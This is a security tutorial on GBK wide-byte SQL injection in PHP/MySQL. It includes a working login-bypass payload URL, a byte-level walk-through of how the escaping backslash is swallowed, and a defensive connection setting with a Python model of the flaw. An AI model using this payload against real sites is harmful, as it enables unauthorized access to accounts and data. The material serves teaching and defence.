With magic_quotes_gpc = On, any single quote in a submitted parameter is automatically escaped to \', which defeats many injection attempts.
GBK is a double-byte encoding: one Chinese character is stored as two bytes, with the lead byte in 0x81-0xFE and the trail byte in 0x40-0xFE (excluding 0x7F). That trail range includes 0x5C, the encoding of the escape character \.
0xD5 0x5C is the GBK encoding of the Chinese character 誠 ("sincerity"). URL encoding writes each byte as a percent sign followed by its hexadecimal value, so %d5%5c URL-decodes to that character.
The attack proceeds as follows:
Access http://www.2cto.com/test.php?username=test%d5'%20or%201=1%23&pwd=test
The browser encodes the username parameter value (a single quote is 0x27):
username=test%d5%27%20or%201=1%23
PHP URL-decodes it:
username = test 0xd5 0x27 0x20 or 0x20 1=1 0x23 (for readability, spaces separate the literal text from the hexadecimal bytes)
The GPC escaping in PHP then converts the single quote 0x27 to \', i.e. the bytes 0x5c 0x27:
username = test 0xd5 0x5c 0x27 0x20 or 0x20 1=1 0x23
Because the database connection was initialised with SET NAMES 'gbk', the server decodes 0xd5 0x5c as the character 誠, 0x27 as ', 0x20 as a space, and 0x23 as the MySQL comment marker #.
The resulting SQL statement is: SELECT * FROM user WHERE username = 'test誠' or 1=1 #' and password = 'test';
Everything after the comment marker # is ignored, so the statement is equivalent to:
SELECT * FROM user WHERE username = 'test誠' or 1=1;
The WHERE condition is always true, and the injection succeeds.
Supplement:
0xD5 0x5C is not the only sequence that swallows the backslash placed in front of a single quote; any lead byte in 0x81-0xFE followed by 0x5C behaves the same way.
There is no such problem with UTF-8, whose encoding ranges never allow 0x5C inside a multibyte sequence.
The same transformation can also be applied to XSS and other areas. For a server that uses GBK, the connection can be set up as follows (the commented-out SET NAMES line is the vulnerable setting it replaces):
if ($this->server_info() > '4.1') {
    // mysql_query("set names 'gbk'");  // vulnerable: the server decodes client bytes as GBK
    // character_set_client = binary keeps the escaping backslash from pairing with a preceding lead byte
    mysql_query("SET character_set_connection = 'gbk', character_set_results = 'gbk', character_set_client = binary");
}
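As an added example (the editor's own, not code from the original article), the following Python models the byte-level escaping and the way the MySQL lexer walks a quoted literal, then checks whether the quote from the walk-through above survives under character_set_client = gbk versus binary; the charset-aware escaper mirrors what mysql_real_escape_string() does once the connection charset is set. The function names and PAYLOAD are constructed for this illustration.

```python
# Added example (editor's, not the article's code): model how the MySQL lexer
# reads a quoted literal and check whether a single quote survives escaping.

def is_gbk_pair(data: bytes, i: int) -> bool:
    """True if data[i:i+2] is a valid GBK double-byte sequence."""
    return (i + 1 < len(data) and 0x81 <= data[i] <= 0xFE
            and 0x40 <= data[i + 1] <= 0xFE and data[i + 1] != 0x7F)

def addslashes(data: bytes) -> bytes:
    """Byte-level escaping of ' " \\ as magic_quotes_gpc / addslashes() do it."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\":
            out.append(0x5C)          # insert a backslash before the byte
        out.append(b)
    return bytes(out)

def escape_gbk_aware(data: bytes) -> bytes:
    """Charset-aware escaping (as mysql_real_escape_string() with charset gbk):
    complete pairs pass through; a stray lead byte is itself escaped."""
    out, i = bytearray(), 0
    while i < len(data):
        if is_gbk_pair(data, i):
            out += data[i:i + 2]
            i += 2
            continue
        if 0x81 <= data[i] <= 0xFE or data[i] in b"'\"\\":
            out.append(0x5C)
        out.append(data[i])
        i += 1
    return bytes(out)

def literal_has_unescaped_quote(data: bytes, client_is_gbk: bool) -> bool:
    """Walk bytes as the server lexer does inside a quoted literal: a valid
    multibyte pair is consumed whole (only when character_set_client is gbk),
    a backslash consumes the next byte, and a bare quote ends the literal."""
    i = 0
    while i < len(data):
        if client_is_gbk and is_gbk_pair(data, i):
            i += 2
        elif data[i] == 0x5C:
            i += 2
        elif data[i] == 0x27:
            return True
        else:
            i += 1
    return False

# Constructed input from the walk-through: "test", GBK lead byte 0xD5, quote.
PAYLOAD = b"test\xd5'"
```

With character_set_client = gbk the escaped payload still yields a bare quote; with binary, or with the charset-aware escaper, it does not.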